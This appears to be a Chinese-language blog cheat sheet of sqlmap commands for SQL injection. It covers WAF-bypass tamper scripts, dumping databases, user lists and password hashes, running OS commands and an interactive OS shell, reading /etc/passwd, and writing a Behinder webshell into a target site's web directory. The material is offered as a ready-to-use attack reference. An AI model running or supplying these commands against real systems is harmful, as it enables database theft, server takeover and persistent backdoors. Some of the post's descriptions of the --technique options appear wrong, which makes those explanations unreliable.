sqlmap使用笔记 本文最后更新于 2024年8月23日 下午 1、常用命令1python sqlmap.py --random-agent --batch --level=2 --tamper=randomcase -u <url> 2、进阶使用123456789101112131415161718# 指定注入点参数python sqlmap.py -r "request.txt" -p "id"# 延时注入python sqlmap.py -r r.txt --technique=T# 自动爬行目标网站,同时使用表单注入python sqlmap.py -u <url> --crawl=1python sqlmap.py -u <url> --forms --crawl=2python sqlmap.py -u <url> --forms --crawl=all# POST注入|"--method=POST":指定POST请求|"-p":指定参数python sqlmap.py -u <url> --data="username=admin&password=123456"python sqlmap.py -u <url> --data="username=admin&password=123456" -p "username"python sqlmap.py -u <url> --data="username=admin&password=123456" --method=POST# 使用代理python sqlmap.py -u <url> --batch --level=5 --risk=3 --proxy="http://127.0.0.1:8080"# 伪静态注入python sqlmap.py -u "http://example.com/news/1.html" --batch --level=5 --risk=3# 指定数据库python sqlmap.py -u <url> --dbms=mysql 3、延时注入1234# 使用时间延迟注入,每个注入请求之后等待5秒钟python sqlmap.py -u <url> --delay=5# 使用时间延迟注入和布尔型盲注python sqlmap.py -u <url> --delay=5 --technique=T --time-sec=5 4、绕过组合123456# 绕过空格python sqlmap.py -u <url> --tamper=space2comment,space2plus# 绕过引号python sqlmap.py -u <url> --tamper=apostrophemask,apostrophenullencode,doublequotemask,doublequotenullencode# 绕过关键字python sqlmap.py -u <url> --tamper=randomcase,space2morehash 5、基本用法123456789101112131415161718192021222324252627282930313233343536373839404142-D "blog" --tables # 获取表名-D "blog" -T "admin" --columns # 获取字段名-D "blog" -T "admin" -C "username,password" --dump # 获取字段内容--dbs # 获取所有数据库--users # 获取所有用户名称--passwords # 获取所有用户密码--is-dba # 查看当前用户是否是管理员--current-db # 获取当前数据库名称--current-user # 获取当前用户名称--common-tables # 暴力破解表名--common-columns # 暴力破解字段名--random-agent # 使用随机agent--threads 10 # 多线程注入,默认3--batch # 默认全部确定--eta # 预估完成时间--os-cmd=whoami # 执行系统命令--os-shell # 系统交互shell--flush-session # 会清空之前的session,重新测试该目标--fresh-queries # 忽略session文件保存的查询,重新测试该目标# risk--risk=0:最低的风险级别,sqlmap将只执行最基本的测试--risk=1:默认的风险级别,sqlmap将执行一些基本测试和一些较危险的测试--risk=2:sqlmap将执行所有基本测试和所有危险的测试--risk=3:最高的风险级别,sqlmap将执行所有基本测试、所有危险的测试和一些实验性的测试# level--level=1:默认等级,主要检测基本的SQL注入漏洞,测试速度最快--level=2:增加了一些绕过技术和测试方法,测试的深度更深了一些,但仍然比较快--level=3:测试更加深入,包括时间延迟注入、堆叠查询注入等高级注入技术,测试时间相对较长--level=4:测试非常深入,包括二阶注入、布尔型注入等复杂的注入技术,测试时间较长--level=5:测试最为深入,包括文件包含、XML注入等高级注入技术,测试时间最长# technique--technique=BEUSTQ: 基于布尔查询的注入技术--technique=BENCHMARK: 基于数据库性能评估的注入技术--technique=E: 基于错误消息的注入技术--technique=F: 基于文件系统的注入技术--technique=H: 基于HTTP头部的注入技术--technique=M: 基于堆栈的注入技术--technique=N: 基于Null的注入技术--technique=Q: 基于查询的注入技术--technique=S: 基于堆栈的注入技术--technique=T: 基于时间延迟的注入技术--technique=U: 基于Union查询的注入技术 6、高级用法123456# 读取指定文件--file-read /etc/passwd# 写入webshell--file-write "D:\\File\\Tools\\Default\\Behinder\\Behinder_v3.0_Beta_6\\server\\shell.php" --file-dest "G://HCEOA//www//frame//help//frame//help//shell.php" # 执行指定的sql语句--sql-query="<SQL_query>" 7、指定数据库123456789101112131415MySQL:--dbms=mysqlPostgreSQL:--dbms=postgresqlMicrosoft SQL Server:--dbms=mssqlMicrosoft Access:--dbms=mdbOracle:--dbms=oracleSQLite:--dbms=sqliteSybase:--dbms=sybaseFirebird:--dbms=firebirdInformix:--dbms=informixMaxDB:--dbms=maxdbDB2:--dbms=db2HSQLDB:--dbms=hsqldbMonetDB:--dbms=monetdbTeradata:--dbms=teradataMariaDB:--dbms=mariadb 8、tamper脚本12345678910111213141516171819202122232425262728293031323334randomcase.py # 作用:随机大小写space2comment.py # 作用:将空格替换为/**/space2plus.py # 作用:用加号替换空格randomcomments.py # 作用:用注释符分割sql关键字multiplespaces.py # 作用:围绕sql关键字添加多个空格versionedkeywords.py # 作用:注释绕过apostrophemask.py # 作用:将引号替换为utf-8,用于过滤单引号base64encode.py # 作用:替换为base64编码multiplespaces.py # 作用:围绕sql关键字添加多个空格nonrecursivereplacement.py # 作用:作为双重查询语句,用双重语句替代预定义的sql关键字space2randomblank.py # 作用:将空格替换为其他有效字符unionalltounion.py # 作用:将union allselect 替换为unionselectsecuresphere.py # 作用:追加特定的字符串space2dash.py # 作用:将空格替换为--,并添加一个随机字符串和换行符space2mssqlblank.py # 作用:将空格随机替换为其他空格符号between.py # 作用:用NOT BETWEEN 0 AND # 替换>percentage.py # 作用:在每个字符前添加一个%sp_password.py # 作用:从T-SQL日志的自动迷糊处理的有效载荷中追加sp_passwordcharencode.py # 作用:对给定的payload全部字符使用url编码(不处理已经编码的字符)charunicodeencode.py # 作用:适用字符串的unicode编码equaltolike.py # 作用:将=替换为LIKEifnull2ifisnull.py # 作用:将类似于IFNULL(A, B)替换为IF(ISNULL(A), B, A),绕过对IFNULL的过滤modsecurityversioned.py # 作用:过滤空格,使用mysql内联注释的方式进行注入space2mysqlblank.py # 作用:将空格替换为其他空格符号('%09', '%0A', '%0C', '%0D', '%0B')modsecurityzeroversioned.py # 作用:使用内联注释方式(/*!00000*/)进行注入space2mysqldash.py # 作用:将空格替换为 -- ,并追随一个换行符bluecoat.py # 作用:在sql语句之后用有效的随机空白字符替换空格符,随后用LIKE替换=versionedkeywords.py # 作用:注释绕过halfversionedmorekeywords.py # 作用:在每个关键字前添加mysql版本注释space2morehash.py # 作用:将空格替换为# ,并添加一个随机字符串和换行符apostrophenullencode.py # 作用:用非法双字节Unicode字符替换单引号appendnullbyte.py # 作用:在有效载荷的结束位置加载null字节字符编码chardoubleencode.py # 作用:对给定的payload全部字符使用双重url编码(不处理已经编码的字符)unmagicquotes.py # 作用:用一个多字节组合%bf%27和末尾通用注释一起替换空格 工具使用 #sqlmap #SQL注入 dirsearch使用笔记 上一篇 cobalt strike免杀360 下一篇